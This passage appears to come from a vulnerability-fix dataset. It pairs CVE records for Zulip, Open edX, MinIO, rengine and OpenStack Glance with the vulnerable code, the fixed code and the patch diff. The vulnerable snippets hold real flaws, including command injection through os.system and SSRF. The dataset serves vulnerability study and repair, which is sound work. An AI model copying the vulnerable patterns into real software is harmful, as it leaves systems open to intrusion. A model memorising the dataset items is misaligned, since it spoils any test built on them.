)\n do_change_user_role(target, role, acting_user=user_profile)\n\n if full_name is not None and target.full_name != full_name and full_name.strip() != \"\":\n # We don't respect `name_changes_disabled` here because the request\n # is on behalf of the administrator.\n 
check_change_full_name(target, full_name, user_profile)\n\n if profile_data is not None:\n clean_profile_data: List[ProfileDataElementUpdateDict] = []\n for entry in profile_data:\n assert isinstance(entry[\"id\"], int)\n assert not isinstance(entry[\"value\"], int)\n if entry[\"value\"] is None or not entry[\"value\"]:\n field_id = entry[\"id\"]\n check_remove_custom_profile_field_value(target, field_id)\n else:\n clean_profile_data.append(\n {\n \"id\": entry[\"id\"],\n \"value\": entry[\"value\"],\n }\n )\n validate_user_custom_profile_data(target.realm.id, clean_profile_data)\n do_update_user_custom_profile_data_if_changed(target, clean_profile_data)\n\n return json_success(request)"}, {"id": "fix_py_409_2", "commit": "751b2a03e565e9eb02ffe923b7c24ac73d604034", "file_path": "zerver/views/users.py", "start_line": 305, "end_line": 407, "snippet": "def patch_bot_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n bot_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n bot_owner_id: Optional[int] = REQ(json_validator=check_int, default=None),\n config_data: Optional[Dict[str, str]] = REQ(\n default=None, json_validator=check_dict(value_validator=check_string)\n ),\n service_payload_url: Optional[str] = REQ(json_validator=check_url, default=None),\n service_interface: int = REQ(json_validator=check_int, default=1),\n default_sending_stream: Optional[str] = REQ(default=None),\n default_events_register_stream: Optional[str] = REQ(default=None),\n default_all_public_streams: Optional[bool] = REQ(default=None, json_validator=check_bool),\n) -> HttpResponse:\n bot = access_bot_by_id(user_profile, bot_id)\n\n if full_name is not None:\n check_change_bot_full_name(bot, full_name, user_profile)\n\n if role is not None and bot.role != role:\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n elif not user_profile.is_realm_admin:\n raise OrganizationAdministratorRequired()\n\n do_change_user_role(bot, role, acting_user=user_profile)\n\n if bot_owner_id is not None:\n try:\n owner = get_user_profile_by_id_in_realm(bot_owner_id, user_profile.realm)\n except UserProfile.DoesNotExist:\n raise JsonableError(_(\"Failed to change owner, no such user\"))\n if not owner.is_active:\n raise JsonableError(_(\"Failed to change owner, user is deactivated\"))\n if owner.is_bot:\n raise JsonableError(_(\"Failed to change owner, bots can't own other bots\"))\n\n previous_owner = bot.bot_owner\n if previous_owner != owner:\n do_change_bot_owner(bot, owner, user_profile)\n\n if default_sending_stream is not None:\n if default_sending_stream == \"\":\n stream: Optional[Stream] = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_sending_stream)\n do_change_default_sending_stream(bot, stream, acting_user=user_profile)\n if default_events_register_stream is not None:\n if default_events_register_stream == \"\":\n stream = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_events_register_stream)\n do_change_default_events_register_stream(bot, stream, acting_user=user_profile)\n if default_all_public_streams is not None:\n do_change_default_all_public_streams(\n bot, default_all_public_streams, acting_user=user_profile\n )\n\n if service_payload_url is not None:\n check_valid_interface_type(service_interface)\n assert 
service_interface is not None\n do_update_outgoing_webhook_service(bot, service_interface, service_payload_url)\n\n if config_data is not None:\n do_update_bot_config_data(bot, config_data)\n\n if len(request.FILES) == 0:\n pass\n elif len(request.FILES) == 1:\n user_file = list(request.FILES.values())[0]\n assert isinstance(user_file, UploadedFile)\n assert user_file.size is not None\n upload_avatar_image(user_file, user_profile, bot)\n avatar_source = UserProfile.AVATAR_FROM_USER\n do_change_avatar_fields(bot, avatar_source, acting_user=user_profile)\n else:\n raise JsonableError(_(\"You may only upload one file at a time\"))\n\n json_result = dict(\n full_name=bot.full_name,\n avatar_url=avatar_url(bot),\n service_interface=service_interface,\n service_payload_url=service_payload_url,\n config_data=config_data,\n default_sending_stream=get_stream_name(bot.default_sending_stream),\n default_events_register_stream=get_stream_name(bot.default_events_register_stream),\n default_all_public_streams=bot.default_all_public_streams,\n )\n\n # Don't include the bot owner in case it is not set.\n # Default bots have no owner.\n if bot.bot_owner is not None:\n json_result[\"bot_owner\"] = bot.bot_owner.email\n\n return json_success(request, data=json_result)"}], "vul_patch": "--- a/zerver/views/users.py\n+++ b/zerver/views/users.py\n@@ -20,13 +20,13 @@\n \n if role is not None and target.role != role:\n # Require that the current user has permissions to\n- # grant/remove the role in question. access_user_by_id has\n- # already verified we're an administrator; here we enforce\n- # that only owners can toggle the is_realm_owner flag.\n+ # grant/remove the role in question.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n+ elif not user_profile.is_realm_admin:\n+ raise OrganizationAdministratorRequired()\n \n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n\n--- a/zerver/views/users.py\n+++ b/zerver/views/users.py\n@@ -28,6 +28,8 @@\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n+ elif not user_profile.is_realm_admin:\n+ raise OrganizationAdministratorRequired()\n \n do_change_user_role(bot, role, acting_user=user_profile)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-22209", "cve_description": "Open edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/openedx/edx-platform", "patch_url": ["https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_293_1", "commit": "e7fc0c6", "file_path": "lms/djangoapps/courseware/block_render.py", "start_line": 737, "end_line": 795, "snippet": "def handle_xblock_callback(request, course_id, usage_id, handler, suffix=None):\n \"\"\"\n Generic view for extensions. 
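Distilled from the Zulip diff above: the pre-fix code guarded owner-role transitions but had no fallback branch, so any member who could reach `patch_bot_backend` for a bot they owned could assign it an administrator role. A runnable sketch of the two guards, with illustrative role constants and a minimal acting-user stand-in (Zulip's real objects and exception types are not reproduced):

```python
from dataclasses import dataclass

# Illustrative role constants; the exact numeric values are assumptions.
ROLE_OWNER, ROLE_ADMIN, ROLE_MEMBER = 100, 200, 400

@dataclass
class ActingUser:
    is_realm_owner: bool
    is_realm_admin: bool

def check_role_change(acting_user: ActingUser, old_role: int, new_role: int) -> None:
    # Guard that existed before the fix: only owners may touch owner roles.
    if ROLE_OWNER in (old_role, new_role) and not acting_user.is_realm_owner:
        raise PermissionError("organization owner required")
    # Guard the fix adds: any other role change still requires an admin.
    # Without it, a plain member could set ROLE_ADMIN on a bot they own.
    if not acting_user.is_realm_admin:
        raise PermissionError("organization administrator required")

# A member (neither owner nor admin) promoting a bot to admin is rejected:
# check_role_change(ActingUser(False, False), ROLE_MEMBER, ROLE_ADMIN)
```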
This is where AJAX calls go.\n\n Arguments:\n request (Request): Django request.\n course_id (str): Course containing the block\n usage_id (str)\n handler (str)\n suffix (str)\n\n Raises:\n HttpResponseForbidden: If the request method is not `GET` and user is not authenticated.\n Http404: If the course is not found in the modulestore.\n \"\"\"\n # In this case, we are using Session based authentication, so we need to check CSRF token.\n if request.user.is_authenticated:\n error = CsrfViewMiddleware(get_response=lambda request: None).process_view(request, None, (), {})\n if error:\n return error\n\n # We are reusing DRF logic to provide support for JWT and Oauth2. We abandoned the idea of using DRF view here\n # to avoid introducing backwards-incompatible changes.\n # You can see https://github.com/openedx/XBlock/pull/383 for more details.\n else:\n authentication_classes = (JwtAuthentication, BearerAuthenticationAllowInactiveUser)\n authenticators = [auth() for auth in authentication_classes]\n\n for authenticator in authenticators:\n try:\n user_auth_tuple = authenticator.authenticate(request)\n except APIException:\n log.exception(\n \"XBlock handler %r failed to authenticate with %s\", handler, authenticator.__class__.__name__\n )\n else:\n if user_auth_tuple is not None:\n request.user, _ = user_auth_tuple\n break\n\n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n if request.method != 'GET' and not (request.user and request.user.is_authenticated):\n return HttpResponseForbidden('Unauthenticated')\n\n request.user.known = request.user.is_authenticated\n\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n raise Http404(f'{course_id} is not a valid course key') # lint-amnesty, pylint: disable=raise-missing-from\n\n with modulestore().bulk_operations(course_key):\n try:\n course = modulestore().get_course(course_key)\n except ItemNotFoundError:\n raise Http404(f'{course_id} does not exist in the modulestore') # lint-amnesty, pylint: disable=raise-missing-from\n\n return _invoke_xblock_handler(request, course_id, usage_id, handler, suffix, course=course)"}], "fix_func": [{"id": "fix_py_293_1", "commit": "019888f3d15beaebcb7782934f6c43b0c2b3735e", "file_path": "lms/djangoapps/courseware/block_render.py", "start_line": 738, "end_line": 803, "snippet": "def handle_xblock_callback(request, course_id, usage_id, handler, suffix=None):\n \"\"\"\n Generic view for extensions. This is where AJAX calls go.\n\n Arguments:\n request (Request): Django request.\n course_id (str): Course containing the block\n usage_id (str)\n handler (str)\n suffix (str)\n\n Raises:\n HttpResponseForbidden: If the request method is not `GET` and user is not authenticated.\n Http404: If the course is not found in the modulestore.\n \"\"\"\n # In this case, we are using Session based authentication, so we need to check CSRF token.\n if request.user.is_authenticated:\n error = CsrfViewMiddleware(get_response=lambda request: None).process_view(request, None, (), {})\n if error:\n return error\n\n # We are reusing DRF logic to provide support for JWT and Oauth2. 
We abandoned the idea of using DRF view here\n # to avoid introducing backwards-incompatible changes.\n # You can see https://github.com/openedx/XBlock/pull/383 for more details.\n else:\n authentication_classes = (JwtAuthentication, BearerAuthenticationAllowInactiveUser)\n authenticators = [auth() for auth in authentication_classes]\n\n for authenticator in authenticators:\n try:\n user_auth_tuple = authenticator.authenticate(request)\n except APIException:\n log.exception(\n \"XBlock handler %r failed to authenticate with %s\", handler, authenticator.__class__.__name__\n )\n else:\n if user_auth_tuple is not None:\n # When using JWT authentication, the second element contains the JWT token. We need it to determine\n # whether the application that issued the token is restricted.\n request.user, request.auth = user_auth_tuple\n # This is verified by the `JwtRestrictedApplication` before it decodes the token.\n request.successful_authenticator = authenticator\n break\n\n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n # Block all request types coming from restricted applications.\n if (\n request.method != 'GET' and not (request.user and request.user.is_authenticated)\n ) or JwtRestrictedApplication().has_permission(request, None): # type: ignore\n return HttpResponseForbidden('Unauthenticated')\n\n request.user.known = request.user.is_authenticated\n\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n raise Http404(f'{course_id} is not a valid course key') # lint-amnesty, pylint: disable=raise-missing-from\n\n with modulestore().bulk_operations(course_key):\n try:\n course = modulestore().get_course(course_key)\n except ItemNotFoundError:\n raise Http404(f'{course_id} does not exist in the modulestore') # lint-amnesty, pylint: disable=raise-missing-from\n\n return _invoke_xblock_handler(request, course_id, usage_id, handler, suffix, course=course)"}], "vul_patch": "--- a/lms/djangoapps/courseware/block_render.py\n+++ b/lms/djangoapps/courseware/block_render.py\n@@ -35,12 +35,19 @@\n )\n else:\n if user_auth_tuple is not None:\n- request.user, _ = user_auth_tuple\n+ # When using JWT authentication, the second element contains the JWT token. We need it to determine\n+ # whether the application that issued the token is restricted.\n+ request.user, request.auth = user_auth_tuple\n+ # This is verified by the `JwtRestrictedApplication` before it decodes the token.\n+ request.successful_authenticator = authenticator\n break\n \n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n- if request.method != 'GET' and not (request.user and request.user.is_authenticated):\n+ # Block all request types coming from restricted applications.\n+ if (\n+ request.method != 'GET' and not (request.user and request.user.is_authenticated)\n+ ) or JwtRestrictedApplication().has_permission(request, None): # type: ignore\n return HttpResponseForbidden('Unauthenticated')\n \n request.user.known = request.user.is_authenticated\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-21287", "cve_description": "MinIO is a High Performance Object Storage released under Apache License v2.0. 
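The core of the Open edX fix above is bookkeeping: DRF-style authenticators return a `(user, auth)` tuple, and the old loop threw away the second element, so `JwtRestrictedApplication` had nothing to inspect. A hedged sketch of the pattern, using a generic authenticator loop rather than edx-platform's actual classes:

```python
def authenticate_request(request, authenticators):
    """Run DRF-style authenticators; keep the token and authenticator.

    Sketch only: `request` is any object attributes can be set on, and
    each authenticator returns None or a (user, auth) tuple like DRF's.
    """
    for authenticator in authenticators:
        result = authenticator.authenticate(request)
        if result is not None:
            # Pre-fix code did `request.user, _ = result`, discarding the
            # JWT, so downstream scope checks silently passed.
            request.user, request.auth = result
            request.successful_authenticator = authenticator
            return True
    return False
```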
In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. The target application may have functionality for importing data from a URL, publishing data to a URL, or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal etc.). In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL from which the code running on the server will read data or to which it will submit data, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP-enabled databases, or perform POST requests towards internal services which are not intended to be exposed. This is fixed in version RELEASE.2021-01-30T00-20-58Z; all users are advised to upgrade. As a workaround you can disable the browser front-end with the \"MINIO_BROWSER=off\" environment variable.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276"], "programing_language": "Go", "vul_func": [{"id": "vul_go_137_1", "commit": "9cdd981", "file_path": "cmd/web-handlers.go", "start_line": 2206, "end_line": 2255, "snippet": "func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n\tctx := newWebContext(r, args, \"WebLoginSTS\")\n\n\tv := url.Values{}\n\tv.Set(\"Action\", webIdentity)\n\tv.Set(\"WebIdentityToken\", args.Token)\n\tv.Set(\"Version\", stsAPIVersion)\n\n\tscheme := \"http\"\n\tif sourceScheme := handlers.GetSourceScheme(r); sourceScheme != \"\" {\n\t\tscheme = sourceScheme\n\t}\n\tif globalIsTLS {\n\t\tscheme = \"https\"\n\t}\n\n\tu := &url.URL{\n\t\tScheme: scheme,\n\t\tHost: r.Host,\n\t}\n\n\tu.RawQuery = v.Encode()\n\n\treq, err := http.NewRequest(http.MethodPost, u.String(), nil)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\tclnt := &http.Client{\n\t\tTransport: NewGatewayHTTPTransport(),\n\t}\n\tresp, err := clnt.Do(req)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\tdefer xhttp.DrainBody(resp.Body)\n\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn toJSONError(ctx, errors.New(resp.Status))\n\t}\n\n\ta := AssumeRoleWithWebIdentityResponse{}\n\tif err = xml.NewDecoder(resp.Body).Decode(&a); err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\treply.Token = a.Result.Credentials.SessionToken\n\treply.UIVersion = browser.UIVersion\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_137_1", "commit": "eb6871e", "file_path": "cmd/web-handlers.go", "start_line": 2207, "end_line": 2261, "snippet": "func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n\tctx := newWebContext(r, args, \"WebLoginSTS\")\n\n\tif globalOpenIDValidators == nil {\n\t\treturn toJSONError(ctx, errSTSNotInitialized)\n\t}\n\n\tv, err := globalOpenIDValidators.Get(\"jwt\")\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\treturn toJSONError(ctx, errSTSNotInitialized)\n\t}\n\n\tm, err := 

v.Validate(args.Token, \"\")\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// JWT has requested a custom claim with policy value set.\n\t// This is a MinIO STS API specific value, this value should\n\t// be set and configured on your identity provider as part of\n\t// JWT custom claims.\n\tvar policyName string\n\tpolicySet, ok := iampolicy.GetPoliciesFromClaims(m, iamPolicyClaimNameOpenID())\n\tif ok {\n\t\tpolicyName = globalIAMSys.CurrentPolicies(strings.Join(policySet.ToSlice(), \",\"))\n\t}\n\tif policyName == \"\" && globalPolicyOPA == nil {\n\t\treturn toJSONError(ctx, fmt.Errorf(\"%s claim missing from the JWT token, credentials will not be generated\", iamPolicyClaimNameOpenID()))\n\t}\n\tm[iamPolicyClaimNameOpenID()] = policyName\n\n\tsecret := globalActiveCred.SecretKey\n\tcred, err := auth.GetNewCredentialsWithMetadata(m, secret)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// Set the newly generated credentials.\n\tif err = globalIAMSys.SetTempUser(cred.AccessKey, cred, policyName); err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// Notify all other MinIO peers to reload temp users\n\tfor _, nerr := range globalNotificationSys.LoadUser(cred.AccessKey, true) {\n\t\tif nerr.Err != nil {\n\t\t\tlogger.GetReqInfo(ctx).SetTags(\"peerAddress\", nerr.Host.String())\n\t\t\tlogger.LogIf(ctx, nerr.Err)\n\t\t}\n\t}\n\n\treply.Token = cred.SessionToken\n\treply.UIVersion = browser.UIVersion\n\treturn nil\n}"}, {"id": "fix_go_137_2", "commit": "eb6871e", "file_path": "cmd/web-handlers.go", "start_line": 2204, "end_line": 2204, "snippet": "var errSTSNotInitialized = errors.New(\"STS API not initialized, please configure STS support\")"}], "vul_patch": "--- a/cmd/web-handlers.go\n+++ b/cmd/web-handlers.go\n@@ -1,50 +1,55 @@\n func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n \tctx := newWebContext(r, args, \"WebLoginSTS\")\n \n-\tv := url.Values{}\n-\tv.Set(\"Action\", webIdentity)\n-\tv.Set(\"WebIdentityToken\", args.Token)\n-\tv.Set(\"Version\", stsAPIVersion)\n-\n-\tscheme := \"http\"\n-\tif sourceScheme := handlers.GetSourceScheme(r); sourceScheme != \"\" {\n-\t\tscheme = sourceScheme\n-\t}\n-\tif globalIsTLS {\n-\t\tscheme = \"https\"\n+\tif globalOpenIDValidators == nil {\n+\t\treturn toJSONError(ctx, errSTSNotInitialized)\n \t}\n \n-\tu := &url.URL{\n-\t\tScheme: scheme,\n-\t\tHost: r.Host,\n+\tv, err := globalOpenIDValidators.Get(\"jwt\")\n+\tif err != nil {\n+\t\tlogger.LogIf(ctx, err)\n+\t\treturn toJSONError(ctx, errSTSNotInitialized)\n \t}\n \n-\tu.RawQuery = v.Encode()\n-\n-\treq, err := http.NewRequest(http.MethodPost, u.String(), nil)\n+\tm, err := v.Validate(args.Token, \"\")\n \tif err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n \n-\tclnt := &http.Client{\n-\t\tTransport: NewGatewayHTTPTransport(),\n+\t// JWT has requested a custom claim with policy value set.\n+\t// This is a MinIO STS API specific value, this value should\n+\t// be set and configured on your identity provider as part of\n+\t// JWT custom claims.\n+\tvar policyName string\n+\tpolicySet, ok := iampolicy.GetPoliciesFromClaims(m, iamPolicyClaimNameOpenID())\n+\tif ok {\n+\t\tpolicyName = globalIAMSys.CurrentPolicies(strings.Join(policySet.ToSlice(), \",\"))\n \t}\n-\tresp, err := clnt.Do(req)\n+\tif policyName == \"\" && globalPolicyOPA == nil {\n+\t\treturn toJSONError(ctx, fmt.Errorf(\"%s claim missing from the JWT token, credentials will not be generated\", 
iamPolicyClaimNameOpenID()))\n+\t}\n+\tm[iamPolicyClaimNameOpenID()] = policyName\n+\n+\tsecret := globalActiveCred.SecretKey\n+\tcred, err := auth.GetNewCredentialsWithMetadata(m, secret)\n \tif err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n-\tdefer xhttp.DrainBody(resp.Body)\n \n-\tif resp.StatusCode != http.StatusOK {\n-\t\treturn toJSONError(ctx, errors.New(resp.Status))\n-\t}\n-\n-\ta := AssumeRoleWithWebIdentityResponse{}\n-\tif err = xml.NewDecoder(resp.Body).Decode(&a); err != nil {\n+\t// Set the newly generated credentials.\n+\tif err = globalIAMSys.SetTempUser(cred.AccessKey, cred, policyName); err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n \n-\treply.Token = a.Result.Credentials.SessionToken\n+\t// Notify all other MinIO peers to reload temp users\n+\tfor _, nerr := range globalNotificationSys.LoadUser(cred.AccessKey, true) {\n+\t\tif nerr.Err != nil {\n+\t\t\tlogger.GetReqInfo(ctx).SetTags(\"peerAddress\", nerr.Host.String())\n+\t\t\tlogger.LogIf(ctx, nerr.Err)\n+\t\t}\n+\t}\n+\n+\treply.Token = cred.SessionToken\n \treply.UIVersion = browser.UIVersion\n \treturn nil\n }\n\n--- /dev/null\n+++ b/cmd/web-handlers.go\n@@ -0,0 +1 @@\n+var errSTSNotInitialized = errors.New(\"STS API not initialized, please configure STS support\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1813", "cve_description": "OS Command Injection in GitHub repository yogeshojha/rengine prior to 1.2.0.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/yogeshojha/rengine", "patch_url": ["https://github.com/yogeshojha/rengine/commit/8277cec0f008a0451371a92e7e0bf082ab3f0c34"], "programing_language": "Python", "vul_func": [{"id": "vul_py_116_1", "commit": "72a5fb2", "file_path": "web/reNgine/common_func.py", "start_line": 668, "end_line": 709, "snippet": "def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)\n os.system(cms_detector_command)\n\n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n parsed_url = urlparse(url)\n\n domain_name = parsed_url.hostname\n port = parsed_url.port\n\n find_dir = domain_name\n\n if port:\n find_dir += '_{}'.format(port)\n\n\n print(url)\n print(find_dir)\n\n # subdomain may also have port number, and is stored in dir as _port\n\n cms_dir_path = '/usr/src/github/CMSeeK/Result/{}'.format(find_dir)\n cms_json_path = cms_dir_path + '/cms.json'\n\n if os.path.isfile(cms_json_path):\n cms_file_content = json.loads(open(cms_json_path, 'r').read())\n if not cms_file_content.get('cms_id'):\n return response\n response = {}\n response = cms_file_content\n response['status'] = True\n # remove cms dir path\n try:\n shutil.rmtree(cms_dir_path)\n except Exception as e:\n print(e)\n\n return response"}], "fix_func": [{"id": "fix_py_116_1", "commit": "8277cec", "file_path": "web/reNgine/common_func.py", "start_line": 669, "end_line": 714, "snippet": "def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n 
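For the MinIO `LoginSTS` record above, the essence of the bug is that the server rebuilt a URL from the client-supplied `Host` header and then fetched that URL itself. A toy Python illustration of the before/after shape (not MinIO code; `validate_jwt` is a placeholder for the local OpenID validation the patch switches to, and `requests` is assumed available):

```python
import requests

def login_sts_vulnerable(request_host: str, token: str):
    # request_host comes straight from the client's Host header, so a
    # forged Host steers this server-side request anywhere: classic SSRF.
    url = f"http://{request_host}/?Action=AssumeRoleWithWebIdentity"
    return requests.post(url, data={"WebIdentityToken": token})

def login_sts_fixed(validate_jwt, token: str):
    # The patched handler makes no HTTP request at all: it validates the
    # token in-process and mints credentials locally.
    claims = validate_jwt(token)  # raises on an invalid token
    return claims
```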
cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py --random-agent --batch --follow-redirect'\n subprocess_splitted_command = cms_detector_command.split()\n subprocess_splitted_command.append('-u')\n subprocess_splitted_command.append(url)\n process = subprocess.Popen(subprocess_splitted_command)\n process.wait()\n\n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n parsed_url = urlparse(url)\n\n domain_name = parsed_url.hostname\n port = parsed_url.port\n\n find_dir = domain_name\n\n if port:\n find_dir += '_{}'.format(port)\n\n\n print(url)\n print(find_dir)\n\n # subdomain may also have port number, and is stored in dir as _port\n\n cms_dir_path = '/usr/src/github/CMSeeK/Result/{}'.format(find_dir)\n cms_json_path = cms_dir_path + '/cms.json'\n\n if os.path.isfile(cms_json_path):\n cms_file_content = json.loads(open(cms_json_path, 'r').read())\n if not cms_file_content.get('cms_id'):\n return response\n response = {}\n response = cms_file_content\n response['status'] = True\n # remove cms dir path\n try:\n shutil.rmtree(cms_dir_path)\n except Exception as e:\n print(e)\n\n return response"}], "vul_patch": "--- a/web/reNgine/common_func.py\n+++ b/web/reNgine/common_func.py\n@@ -1,8 +1,12 @@\n def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n- cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)\n- os.system(cms_detector_command)\n+ cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py --random-agent --batch --follow-redirect'\n+ subprocess_splitted_command = cms_detector_command.split()\n+ subprocess_splitted_command.append('-u')\n+ subprocess_splitted_command.append(url)\n+ process = subprocess.Popen(subprocess_splitted_command)\n+ process.wait()\n \n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-7200", "cve_description": "An SSRF issue was discovered in OpenStack Glance before Newton. The 'copy_from' feature in the Image Service API v1 allowed an attacker to perform masked network port scans. With v1, it is possible to create images with a URL such as 'http://localhost:22'. This could then allow an attacker to enumerate internal network details while appearing masked, since the scan would appear to originate from the Glance Image service.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/openstack/glance", "patch_url": ["https://github.com/openstack/glance/commit/b1ac90f7914d91b25144cc4063fa994fb5019ee3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_272_1", "commit": "cc6ce4a", "file_path": "glance/api/v1/images.py", "start_line": 640, "end_line": 700, "snippet": " def create(self, req, image_meta, image_data):\n \"\"\"\n Adds a new image to Glance. Four scenarios exist when creating an\n image:\n\n 1. If the image data is available directly for upload, create can be\n passed the image data as the request body and the metadata as the\n request headers. 
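The rengine diff above is the textbook CWE-78 remediation: stop interpolating the URL into a shell command string and pass it as a single argv element with no shell. A short sketch follows (the CMSeeK path comes from the record itself; whether the tool exists on a given machine is environment-specific):

```python
import subprocess

url = "http://example.com;id"  # attacker-controlled; ";id" would run in a shell

# Vulnerable shape (do not use): the shell parses the interpolated URL.
# os.system(f"python3 /usr/src/github/CMSeeK/cmseek.py -u {url} --batch")

# Fixed shape, mirroring the patch: an argv list with shell=False (the
# default), so the URL is one opaque argument whatever characters it holds.
proc = subprocess.Popen(
    ["python3", "/usr/src/github/CMSeeK/cmseek.py",
     "--random-agent", "--batch", "--follow-redirect", "-u", url]
)
proc.wait()
```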
The image will initially be 'queued', during\n upload it will be in the 'saving' status, and then 'killed' or\n 'active' depending on whether the upload completed successfully.\n\n 2. If the image data exists somewhere else, you can upload indirectly\n from the external source using the x-glance-api-copy-from header.\n Once the image is uploaded, the external store is not subsequently\n consulted, i.e. the image content is served out from the configured\n glance image store. State transitions are as for option #1.\n\n 3. If the image data exists somewhere else, you can reference the\n source using the x-image-meta-location header. The image content\n will be served out from the external store, i.e. is never uploaded\n to the configured glance image store.\n\n 4. If the image data is not available yet, but you'd like reserve a\n spot for it, you can omit the data and a record will be created in\n the 'queued' state. This exists primarily to maintain backwards\n compatibility with OpenStack/Rackspace API semantics.\n\n The request body *must* be encoded as application/octet-stream,\n otherwise an HTTPBadRequest is returned.\n\n Upon a successful save of the image data and metadata, a response\n containing metadata about the image is returned, including its\n opaque identifier.\n\n :param req: The WSGI/Webob Request object\n :param image_meta: Mapping of metadata about image\n :param image_data: Actual image data that is to be stored\n\n :raises HTTPBadRequest if x-image-meta-location is missing\n and the request body is not application/octet-stream\n image data.\n \"\"\"\n self._enforce(req, 'add_image')\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n\n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n image_meta = self._handle_source(req, id, image_meta, image_data)\n\n location_uri = image_meta.get('location')\n if location_uri:\n self.update_store_acls(req, id, location_uri, public=is_public)\n\n # Prevent client from learning the location, as it\n # could contain security credentials\n image_meta.pop('location', None)\n\n return {'image_meta': image_meta}"}], "fix_func": [{"id": "fix_py_272_1", "commit": "b1ac90f7914d91b25144cc4063fa994fb5019ee3", "file_path": "glance/api/v1/images.py", "start_line": 640, "end_line": 702, "snippet": " def create(self, req, image_meta, image_data):\n \"\"\"\n Adds a new image to Glance. Four scenarios exist when creating an\n image:\n\n 1. If the image data is available directly for upload, create can be\n passed the image data as the request body and the metadata as the\n request headers. The image will initially be 'queued', during\n upload it will be in the 'saving' status, and then 